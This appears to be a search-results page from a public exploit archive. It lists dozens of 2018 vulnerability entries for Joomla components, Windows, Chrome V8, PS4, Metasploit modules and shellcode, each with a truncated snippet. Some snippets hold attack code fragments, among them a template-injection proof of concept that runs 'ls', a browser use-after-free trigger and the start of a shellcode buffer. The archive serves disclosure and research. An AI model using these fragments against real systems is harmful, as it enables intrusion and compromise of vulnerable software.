47904 matches found
Asterisk chan_pjsip 15.2.0 - 'INVITE' Denial of Service
''' Crash occurs when sending a repeated number of INVITE messages over TCP or TLS transport - Authors: - Alfred Farrugia - Sandro Gauci - Latest vulnerable version: Asterisk 15.2.0 running chanpjsip installed with --with-pjproject-bundled - References: AST-2018-005, CVE-2018-7286 - Enable Securi...
Chrome V8 - 'TranslatedState::MaterializeCapturedObjectAt' Type Confusion
/ Here'a snippet of TranslatedState::MaterializeCapturedObjectAt. case JSSETKEYVALUEITERATORTYPE: case JSSETVALUEITERATORTYPE: Handle object = Handle::cast isolate-factory-NewJSObjectFromMapmap, NOTTENURED; Handle properties = materializer.FieldAtvalueindex; Handle elements =...
Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' 'setAttributeNodeNS' WebKit 5.02 / 'bpf' Kernel Loader 4.55
PS4 4.55 Kernel Exploit --- Summary In this project you will find a full implementation of the "bpf" kernel exploit for the PlayStation 4 on 4.55. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, does not...
Concrete5 CMS < 8.3.0 - Username / Comments Enumeration
!/usr/bin/env python3 Concrete5 8.3 vulnerable to Authorization Bypass Through User-Controlled Key IDOR CVE-2017-18195 Chapman R3naissance Schleiss from queue import Queue from threading import Thread from bs4 import BeautifulSoup from tabulate import tabulate import argparse import requests impo...
Transmission - Integer Overflows Parsing Torrent Files
I took a look at torrent file parsing in libtransmission, there are a few integer overflows because the trnew/trnew0 allocation wrappers don't handle overflow. define trnewstructtype, nstructs \ structtype trmalloc sizeof structtype sizetnstructs define trnew0structtype, nstructs \ structtype...
Schools Alert Management Script 2.0.2 - Authentication Bypass
Schools Alert Management Script 2.0.2 - Authentication Bypass. CVE-2018-6859. Webapps exploit for PHP platform Exploit Title: Schools Alert Management Script - 2.0.2 - Authentication Bypass Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...
Chrome V8 - 'PropertyArray' Integer Overflow
/ Here's a snippet of the MigrateFastToFast function which is used to create a new PropertyArray object. int numberoffields = newmap-NumberOfFields; int inobject = newmap-GetInObjectProperties; int unused = newmap-UnusedPropertyFields; ... int totalsize = numberoffields + unused; int external =...
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CloudMe Sync v1.10.9', 'Description' = %q This module exploits a stack-based buffer overflow vulnerability in CloudMe Sync v1.10.9 client...
AsusWRT LAN - Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'AsusWRT LAN Unauthenticated Remote Code Execution', 'Description' = %q The HTTP server in AsusWRT has a flaw where it allows an unauthenticated...
Sony Playstation 4 (PS4) 4.07 < 4.55 - 'bpf' Local Kernel Code Execution (PoC)
function stage4 function mallocsz var backing = new Uint8Array1000+sz; window.nogc.pushbacking; var ptr = p.read8p.leakvalbacking.add320x10; ptr.backing = backing; return ptr; function malloc32sz var backing = new Uint8Array0x1000+sz4; window.nogc.pushbacking; var ptr =...
Disk Savvy Enterprise 10.4.18 - Stack-Based Buffer Overflow (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Disk Savvy Enterprise v10.4.18', 'Description' = %q This module exploits a stack-based buffer overflow vulnerability in Disk Savvy Enterprise...
Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record
Whilst analysing a number of free communication based applications on the Google Play Store, I took a look at WiFi Baby Monitor: Free & Lite the free version of WiFi Baby Monitor. Although the premium version offered users the ability to specify a password to be used in the pairing process, the...
Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record
Papenmeier WiFi Baby Monitor Free & Lite 2.02.2 - Remote Audio Record. CVE-2018-7661. Remote exploit for Android platform Whilst analysing a number of free communication based applications on the Google Play Store, I took a look at WiFi Baby Monitor: Free & Lite the free version of WiFi Baby...
Parallels Remote Application Server 15.5 - Path Traversal
Parallels Remote Application Server 15.5 - Path Traversal. CVE-2017-9447. Webapps exploit for Windows platform Exploit Title: Parallels Remote Application Server RAS 15.5 Path Traversal Date: 22-02-2018 Exploit Author: Nicolas Markitanis - RUNESEC Reviewers: Simon Loizides and Marios Nicolaides -...
Learning and Examination Management System - Cross-Site Scripting
Learning and Examination Management System - Cross-Site Scripting. CVE-2018-6866. Webapps exploit for PHP platform Exploit Title: Learning and Examination Management System Script 2.3.1 – Stored XSS Date: 09.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...
Groupon Clone Script 3.0.2 - Cross-Site Scripting
Groupon Clone Script 3.0.2 - Cross-Site Scripting. CVE-2018-6868. Webapps exploit for PHP platform Exploit Title: Slickdeals/DealNews/Groupon Clone Script 3.0.2 – Stored XSS Date: 09.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...
Parallels Remote Application Server 15.5 - Path Traversal
Exploit Title: Parallels Remote Application Server RAS 15.5 Path Traversal Date: 22-02-2018 Exploit Author: Nicolas Markitanis - RUNESEC Reviewers: Simon Loizides and Marios Nicolaides - RUNESEC Vendor Homepage: https://www.parallels.com/ Affected: Parallels Remote Application Server RAS 15.5 Bui...
NoMachine < 6.0.80 (x64) - 'nxfuse' Privilege Escalation
from ctypes import from ctypes.wintypes import import struct import sys import os MEMCOMMIT = 0x00001000 MEMRESERVE = 0x00002000 PAGEEXECUTEREADWRITE = 0x00000040 GENERICREAD = 0x80000000 GENERICWRITE = 0x40000000 OPENEXISTING = 0x3 STATUSINVALIDHANDLE = 0xC0000008 shellcodelen = 90 s = “” s +=...
Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection
Exploit Title: Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection Dork: N/A Date: 22.02.2018 Vendor Homepage: https://www.joomdonation.com/ Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property/ Version: 3.12.7 Category: Webapps...
Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Trend Micro Email Encryption Gateway Multiple Vulnerabilities 1. Advisory Information Title: Trend Micro Email Encryption Gateway Multiple Vulnerabilities Advisory ID: CORE-2017-0006 Advisory URL:...
Armadito Antivirus 0.12.7.2 - Detection Bypass
/ Title: Armadito Antivirus - Malware Detection Bypass Date: 21/02/2018 Author: Souhail Hammou Author's website: http://rce4fun.blogspot.com Vendor Homepage: http://www.teclib-edition.com/en/ Version: 0.12.7.2 CVE: CVE-2018-7289 Details: -------- An issue was discovered in...
Joomla! Component Proclaim 9.1.1 - Arbitrary File Upload
Exploit Title: Joomla! Component Proclaim 9.1.1 - Arbitrary File Upload Dork: N/A Date: 22.02.2018 Vendor Homepage: https://www.christianwebministries.org/ Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/ Software Download:...
Joomla! Component CheckList 1.1.1 - SQL Injection
Exploit Title: Joomla! Component CheckList 1.1.1 - SQL Injection Dork: N/A Date: 22.02.2018 Vendor Homepage: https://www.joomplace.com/ Software Link: https://extensions.joomla.org/extensions/extension/living/personal-life/checklist/ Version: 1.1.1 Category: Webapps Tested on: WiN7x64/KaLiLinuXx6...
Joomla! Component CW Tags 2.0.6 - SQL Injection
Exploit Title: Joomla! Component CW Tags 2.0.6 - SQL Injection Dork: N/A Date: 22.02.2018 Vendor Homepage: http://www.cwjoomla.com/ Software Link: https://extensions.joomla.org/extensions/extension/search-a-indexing/tags-a-clouds/cw-tags/ Version: 2.0.6 Category: Webapps Tested on:...
Joomla! Component Alexandria Book Library 3.1.2 - 'letter' SQL Injection
Exploit Title: Joomla! Component Alexandria Book Library 3.1.2 - SQL Injection Dork: N/A Date: 22.02.2018 Vendor Homepage: https://alexandriabooklibrary.org/ Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/alexandria-book-library/ Software Download:...
Joomla! Component Ek Rishta 2.9 - SQL Injection
Exploit Title: Joomla! Component Ek Rishta 2.9 - SQL Injection Dork: N/A Date: 22.02.2018 Vendor Homepage: https://www.joomlaextensions.co.in/ Software Link: https://extensions.joomla.org/extensions/extension/living/dating-a-relationships/ek-rishta/ Version: 2.9 Category: Webapps Tested on:...
Joomla! Component PrayerCenter 3.0.2 - 'sessionid' SQL Injection
Exploit Title: Joomla! Component PrayerCenter 3.0.2 - SQL Injection Dork: N/A Date: 22.02.2018 Vendor Homepage: http://www.mlwebtechnologies.com/ Software Link: https://extensions.joomla.org/extensions/extension/living/religion/prayercenter/ Software Download:...
Joomla! Component Proclaim 9.1.1 - Backup File Download
Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download Dork: N/A Date: 22.02.2018 Vendor Homepage: https://www.christianwebministries.org/ Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/ Software Download:...
NoMachine < 6.0.80 (x86) - 'nxfuse' Privilege Escalation
include “stdafx.h” include define DEVICE L”\\.\nxfs-709fd562-36b5-48c6-9952-302da6218061″ define DEVICE2 L”\\.\nxfs-net-709fd562-36b5-48c6-9952-302da6218061709fd562-36b5-48c6-9952-302da6218061” define IOCTL 0x00222014 define IOCTL2 0x00222030 define OUTSIZE 0x90 define INSIZE 0x10 define...
Alibaba Clone Script 1.0.2 - Cross-Site Scripting
Alibaba Clone Script 1.0.2 - Cross-Site Scripting. CVE-2018-6867. Webapps exploit for PHP platform Exploit Title: Alibaba Clone Script 1.0.2 – Stored XSS Date: 09.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/alibaba-clone/ Category...
Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH)
Exploit Title: Disk Savvy Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH Date: 01/02/2018 Exploit Author: Daniel Teixeira Vendor Homepage: http://www.disksavvy.com/ Software Link: http://www.disksavvy.com/setups/disksavvyentsetupv10.4.18.exe Version: 10.4.18 CVE:...
Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)
!/usr/bin/env python Exploit Title: Disk Pulse Enterprise v10.4.18 - 'Import Command' Buffer Overflow SEH Date: 2018-01-22 Exploit Author: Daniel Teixeira Author Homepage: www.danielteixeira.com Vendor Homepage: http://www.diskpulse.com Software Link:...
Wavpack 5.1.0 - Denial of Service
Exploit title: Wavpack 5.1.0 - Denial of Service Date: 20.02.2018 Exploit Author: r4xis https://github.com/r4xis Vendor Homepage: http://www.wavpack.com/ Software Links: http://www.wavpack.com/downloads.html https://github.com/dbry/WavPack Version: Wavpack 5.1.0 Tested on: Debian 9.3.0 64 bit...
EChat Server 3.1 - 'CHAT.ghp' Buffer Overflow
Exploit Author: Juan Sacco Vulnerability found using Exploit Pack v10 - http://exploitpack.com Impact: An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts will result in adenial-of-service condition. Program description...
μTorrent (uTorrent) Classic/Web - JSON-RPC Remote Code Execution / Information Disclosure
By default, utorrent create an HTTP RPC server on port 10000 uTorrent classic or 19575 uTorrent web. There are numerous problems with these RPC servers that can be exploited by any website using XMLHTTPRequest. To be clear, visiting any website is enough to compromise these applications. uTorrent...
Microsoft Windows - Global Reparse Point Security Feature Bypass/Elevation of Privilege
Windows: Global Reparse Point Security Feature Bypass/Elevation of Privilege Platform: Windows 10 1709 functionality not present prior to this version Class: Security Feature Bypass/Elevation of Privilege Summary: It’s possible to use the new Global Reparse Point functionality introduced in Windo...
Microsoft Windows - NPFS Symlink Security Feature Bypass/Elevation of Privilege/Dangerous Behavior
Windows: NPFS Symlink Security Feature Bypass/Elevation of Privilege/Dangerous Behavior Platform: Windows 10 1709 functionality not present prior to this version Class: Security Feature Bypass/Elevation of Privilege/Dangerous Behavior Summary: It’s possible to create NPFS symlinks as a low IL or...
MagniComp SysInfo - mcsiwrapper Privilege Escalation (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'MagniComp SysInfo mcsiwrapper Privilege Escalation', 'Description' = %q This module attempts to gain root privileges on systems running MagniComp...
Microsoft Windows - Constrained Impersonation Capability Privilege Escalation
Windows: Constrained Impersonation Capability EoP Platform: Windows 10 1703/1709 not tested earlier versions Class: Elevation of Privilege Summary: It’s possible to use the constrained impersonation capability added in Windows 10 to impersonate a lowbox SYSTEM token leading to EoP. Description:...
Microsoft Windows Kernel - 'nt!RtlpCopyLegacyContextX86' Stack Memory Disclosure
/ We have discovered a new Windows kernel memory disclosure vulnerability in the creation and copying of a CONTEXT structure to user-mode memory. Two previous bugs in the nearby code area were reported in issues 1177 and 1311 ; in fact, the problem discussed here appears to be a variant of 1177 b...
Microsoft Windows - StorSvc SvcMoveFileInheritSecurity Arbitrary File Creation Privilege Escalation
Windows: StorSvc SvcMoveFileInheritSecurity Arbitrary File Creation EoP Platform: Windows 10 1709 not tested earlier versions Class: Elevation of Privilege Summary: The SvcMoveFileInheritSecurity RPC method in StorSvc can be used to move an arbitrary file to an arbitrary location resulting in...
Microsoft Internet Explorer 11 - 'Js::RegexHelper::RegexReplace' Use-After-Free
var vars = new Array2; function main vars0 = Array1000000.joinString.fromCharCode0x41; vars1 = String.prototype.substring.callvars0, 1, vars0.length; String.prototype.replace.callvars1, RegExp, f; function farg1, arg2, arg3 alertarg3; vars0 = 1; CollectGarbage; return 'a'; main; +0x122e5d:...
Linux/ARM - Bind TCP (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)
Linux/ARM - Bind TCP 4444/TCP Shell /bin/sh + IP Controlled 192.168.1.190 + Null-Free Shellcode 168 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - IP Controlled Bind Shell TCP /bin/sh. Null free shellcode 168 bytes Date: 2018-02-17 Tested: armv7l Raspberry Pi v3 and armv6l Raspber...
Aastra 6755i SIP SP4 - Denial of Service
Exploit Title: Aastra 6755i SIP SP4 | Unauthorized Remote Reboot Date: 17/02/2018 Exploit Author: Wadeek Hardware Version: 6755i Firmware Version: 3.3.1.4053 SP4 Vendor Homepage: http://www.aastra.sg/ Firmware Link:...
Mobile Application Hacking Diary Ep.2
Mobile Application Hacking Diary Ep.2 |=--------------------------------------------------------------------=| |=------------= Mobile Application Hacking Diary Ep.2=--------------=| |=------------------------= 18 February 2018 =----------------------=| |=----------------------= By CWH Underground...
October CMS < 1.0.431 - Cross-Site Scripting
Exploit Title: October CMS Stored Code Injection Date: 16-02-2018 Exploit Author: Samrat Das Contact: http://twitter.com/SamratDas93 Website: https://securitywarrior9.blogspot.in/ Vendor Homepage: https://octobercms.com/ Version: All versions till date from 1.0.431 CVE : CVE- 2018-7198 Categor...
UserSpice 4.3 - Blind SQL Injection
!/usr/env/python """ Application UserSpice PHP user management Vulnerability UserSpice = 4.3 Blind SQL Injection exploit URL https://userspice.com Date 1.2.2018 Author Dolev Farhi About the App: What makes userspice different from almost any other PHP User Management Framework is that it has been...
Twig < 2.4.4 - Server Side Template Injection
Vulnerability details: Exploit Title: Twig Output: 16 2. POC: http://localhost/search?searchkey=44 OUTPUT: 4 http://localhost/search?searchkey=ls OUTPUT: list of files/directories etc…...
Microsoft Edge - 'UnmapViewOfFile' ACG Bypass
Background: To implement ACG https://blogs.windows.com/msedgedev/2017/02/23/mitigating-arbitrary-native-code-execution/VM4y5oTSGCRde3sk.97, Edge uses a separate process for JIT compiling. This JIT Process is also responsible for mapping native code into the requesting Content Process. In order to...
Joomla! Component JB Bus 2.3 - 'order_number' SQL Injection
Exploit Title: Joomla! Component JB Bus 2.3 - SQL Injection Dork: N/A Date: 16.02.2018 Vendor Homepage: http://joombooking.com/ Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jbtransport/ Version: 2.3 Category: Webapps Tested on:...